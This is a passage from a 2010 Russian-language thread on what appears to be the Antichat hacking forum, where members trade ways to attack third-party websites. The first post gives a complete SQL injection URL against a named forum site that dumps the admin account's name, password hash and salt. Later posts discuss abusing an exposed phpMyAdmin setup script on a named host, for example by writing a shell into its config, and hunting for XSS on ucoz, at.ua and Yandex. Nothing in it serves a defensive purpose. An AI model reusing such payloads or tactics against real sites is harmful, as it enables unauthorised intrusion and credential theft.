 |
|
07.01.2010, 15:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
2 Nightmarе
или так
Код:
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)union(select+1,2,3,4,concat_ws(0x3a,name,password,pass_salt),6,7,8,9+from+forum_members+where+id=1)+--+
|
|
|
07.01.2010, 15:56
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
что можно поиметь с этого: _http://vulns.ru/myadmin/scripts/setup.php
реально ли добавить новую БД или попасть в текущую?
|
|
|
|
07.01.2010, 16:03
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от jecka3000
что можно поиметь с этого: _http://vulns.ru/myadmin/scripts/setup.php
реально ли добавить новую БД или попасть в текущую?
Там нет директории конфига, поэтому перезаписать конфиг шеллом не получится.
|
|
|
|
07.01.2010, 16:07
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Root-access, ясно, то есть ничего полезного из этого не сделаешь?
|
|
|
|
07.01.2010, 16:11
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от jecka3000
Root-access, ясно, то есть ничего полезного из этого не сделаешь?
Ну хз, разве что если в этом скрипте есть инъекция или хсс.
|
|
|
|
07.01.2010, 16:24
|
|
Участник форума
Регистрация: 10.11.2009
Сообщений: 122
С нами:
8685055
Репутация:
199
|
|
По вашему опыту: хсс-уязвимости могут быть на сайтах на базе ucoz.ru, at.ua, yandex.ru и т.п.?
|
|
|
|
07.01.2010, 16:26
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Сообщение от Paul_Eckman
По вашему опыту: хсс-уязвимости могут быть на сайтах на базе ucoz.ru, at.ua, yandex.ru и т.п.?
Были\есть на всех вышеуказанных сервисах.
|
|
|
|
07.01.2010, 16:28
|
|
Участник форума
Регистрация: 10.11.2009
Сообщений: 122
С нами:
8685055
Репутация:
199
|
|
Спасибо! Обнаруживаются только с помощью сканеров или вручную тоже можно?
|
|
|
|
07.01.2010, 16:29
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Сообщение от Paul_Eckman
Спасибо! Обнаруживаются только с помощью сканеров или вручную тоже можно?
Только вручную, о каких сканерах может в таких сулчаях ерчь идти вообще оО
|
|
|
|
07.01.2010, 16:33
|
|
Участник форума
Регистрация: 10.11.2009
Сообщений: 122
С нами:
8685055
Репутация:
199
|
|
Не знаю) Я в этом деле пока ламер.  Несколько штук обнаруживала вручную, но говорят, что со сканерами эффективнее. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
